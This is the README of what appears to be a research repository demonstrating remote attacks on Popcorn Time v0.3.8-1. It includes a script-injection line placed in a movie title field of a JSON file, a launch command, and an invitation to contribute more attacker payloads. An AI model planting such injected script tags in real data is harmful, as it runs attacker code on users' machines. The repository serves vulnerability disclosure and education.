In this repository you can find everything you need to launch an attacked against the currently latest stable version of Popcorn Time (v0.3.8-1). All the attacks are remote, but for the sake of simplicity they are currently ran on the same computer. For a detailed blog post, please click here.

There are several attack payloads available in the main directory (files 1.js through 5.js). In the /api/v2/ folder there is a file called list_movies_pct.json. You can select the payload that will execute by changing in the 12th line:

"title_english": "Hot Pursuit<script src='http://127.0.0.1/1.js'></script>",

the script name. Then, from the main directory you need to run start-test-osx.sh:

./start-test-osx.sh

This will launch Popcorn Time with the selected payload.

If you come up with creative ideas for payloads that an attacker can run, please create a Pull Request so we can enrich this repository.

Additionally, if you want to convert the current payloads to other operating systems or create launchers for them too, please feel free to do so and contribute them.

All the content in this repository is provided as-is and for educational purposes only. The authors take no responsiblity for any action or damage that may be caused by using it.

For more information, please see the license.